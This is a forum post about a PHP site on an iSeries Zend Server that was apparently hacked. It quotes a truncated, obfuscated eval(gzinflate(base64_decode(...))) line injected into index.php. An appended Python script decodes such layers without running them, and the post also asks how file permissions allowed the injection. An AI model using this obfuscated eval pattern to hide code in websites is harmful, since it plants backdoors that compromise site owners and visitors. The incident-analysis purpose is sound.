We are running our website with Zend Server on our iSeries and I think the site was hacked. The INDEX.php page had a line inserted with code similar to the following:
<?php eval(gzinflate(base64_decode('ALIGTflpZiAoIWlzc2V0KCRm........ (lots of other letters and numbers after this)
I have two questions:
I know that this is inflating a string and then executing it. I don't know what the inflated string actually is, although I'm sure it is not something good. How can I see the inflated code without actually running it?
How did it get there? The public authority for Index.php had been *RWX (it is now *R) but wouldn't the person who hacked this have needed a valid user profile and password to even access the iSeries?
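For the first question, an added example (not part of the original post): a Python script that reads the PHP source as text, reverses the `base64_decode` and `gzinflate` steps, and returns each decoded layer without ever calling `eval`. The helper names, the 10 MB output cap and the sample wrapper are assumptions made for this illustration. The sample is constructed from a harmless string and is not the payload from the post.

```python
import base64
import re
import zlib

MAX_OUTPUT = 10 * 1024 * 1024  # assumed cap per layer, guards against decompression bombs

# eval(gzinflate(base64_decode('...'))) with either quote style
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])"
    r"([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)


def inflate_layer(b64_text, limit=MAX_OUTPUT):
    """Decode one layer to bytes. The result is only returned, never executed."""
    raw = base64.b64decode(b64_text)
    # PHP's gzinflate() reads raw DEFLATE (no zlib or gzip header): wbits=-15.
    d = zlib.decompressobj(-15)
    out = d.decompress(raw, limit)
    if not d.eof:
        raise ValueError("stream truncated or output larger than limit")
    return out


def reveal(php_source, max_layers=20):
    """Peel nested wrappers; return every decoded layer, outermost first."""
    layers, text = [], php_source
    for _ in range(max_layers):
        match = WRAPPER.search(text)
        if match is None:
            break
        text = inflate_layer(match.group(2)).decode("latin-1")
        layers.append(text)
    return layers


def pack(php_code):
    """Wrap harmless text the same way, to build a constructed sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(php_code.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()


# Constructed sample: two layers around a harmless statement.
SAMPLE_INNER = "echo 'constructed harmless payload';"
SAMPLE = "<?php " + pack(pack(SAMPLE_INNER)) + " ?>"

if __name__ == "__main__":
    for depth, layer in enumerate(reveal(SAMPLE), 1):
        print("--- layer %d ---\n%s" % (depth, layer))
```

Run it against a copy of the modified file on an analysis machine rather than on the web server, and keep the original file unchanged as evidence.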